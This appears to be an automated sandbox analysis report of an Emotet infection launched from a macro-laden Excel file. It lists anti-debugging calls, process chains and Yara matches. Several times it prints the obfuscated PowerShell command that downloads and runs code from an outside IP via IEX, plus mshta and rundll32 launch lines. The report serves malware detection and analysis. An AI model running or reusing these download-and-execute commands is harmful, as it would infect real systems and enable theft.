Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00784087 mov eax, dword ptr fs:[00000030h] 11_2_00784087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00224087 mov eax, dword ptr fs:[00000030h] 12_2_00224087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00314087 mov eax, dword ptr fs:[00000030h] 15_2_00314087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002C4087 mov eax, dword ptr fs:[00000030h] 16_2_002C4087
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",ipGQHkspMd Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",igDWgBQ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",DllRegisterServer Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: NZW-010122 BNUV-280122.xlsm, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\NZW-010122 BNUV-280122.xls, type: DROPPED

Language, Device and Operating System Detection
barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 16.2.rundll32.exe.2d30000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c30000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d60000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.9b0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.4c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2ef0000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e50000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2ba0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2890000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c60000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.950000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.950000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.24a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d00000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.320000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2970000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e40000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3050000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2970000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2cd0000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.9b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2470000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e80000.26.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.24a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.f30000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.810000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.3030000.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2890000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c60000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2dc0000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e10000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2cd0000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.3000000.28.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e70000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3060000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.4c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.af0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.8b0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e20000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fb0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2780000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2ba0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.950000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.8e0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e70000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e10000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c00000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2bd0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.f30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2520000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.880000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2dc0000.22.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d90000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e10000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2d60000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.3000000.28.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.980000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.8b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.810000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2df0000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.af0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2860000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.29e0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2df0000.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.900000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e80000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.2c00000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.551947539.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.676591356.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678280705.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677632301.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.500040027.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677997537.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677450513.0000000002970000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551880508.0000000002FB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677756106.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.554134949.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.450824461.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.502588343.0000000000710000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551919962.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677929606.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551623719.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499259204.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678314605.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.550973971.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551989518.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499994350.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551538985.0000000000901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677111483.0000000000951000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677326122.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.502811029.0000000000771000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.676639526.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678212374.0000000002D91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.676821623.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677356744.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499873731.0000000002781000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.554075703.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499710740.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677199098.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.676670524.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.676732773.0000000000321000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678106332.0000000002D31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499733166.00000000008E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678697687.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551472504.0000000000841000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677832444.0000000002C31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678494850.0000000003000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551824983.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677505319.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551706896.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551513141.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677680233.0000000002BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678137863.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.554395165.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499690055.0000000000881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551450592.0000000000810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678441464.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499762577.0000000000950000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551800161.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.550895567.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499359397.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.677297499.0000000002471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499783564.0000000000981000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678529505.0000000003031000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678356507.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
